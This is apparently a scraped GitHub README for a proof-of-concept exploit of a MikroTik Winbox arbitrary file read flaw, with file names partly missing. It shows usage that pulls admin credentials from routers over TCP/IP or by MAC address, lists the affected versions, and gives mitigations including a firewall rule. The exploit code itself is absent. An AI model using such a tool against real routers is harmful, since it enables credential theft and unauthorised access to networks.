Proof of Concept of Winbox Critical Vulnerability
Clone or download
Pull request Compare This branch is 21 commits behind BasuCert:master.
Latest commit d4816e0 Jun 29, 2018
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore Initial commit Jun 24, 2018
LICENSE Initial commit Jun 24, 2018 kb interrupt Jun 28, 2018 Simplified recv Jun 28, 2018 Update Jun 27, 2018 Update readme Jun 27, 2018 Update extract_user to support passwords longer than 16 chars Jun 26, 2018


Proof of Concept of Winbox Critical Vulnerability
Arbitrary file read


How to use

Winbox (TCP/IP)

$ python3

User: admin
Pass: Th3P4ssWord

MAC server Winbox (Layer 2)
You can extract files even if the device doesn't have an IP address :-)

$ python3
Looking for Mikrotik devices (MAC servers)



$ python3 aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Vulnerable versions

all versions from 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20) are vulnerable ..

Mitigation Techniques

  • Update your RouterOS to the last version or Bugfix version
  • Do not use Winbox and disable it :| it's nothing just a GUI for NooBs ..
  • you may use some Filter Rules (ACL) to deny anonymous accesses to the Router
ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop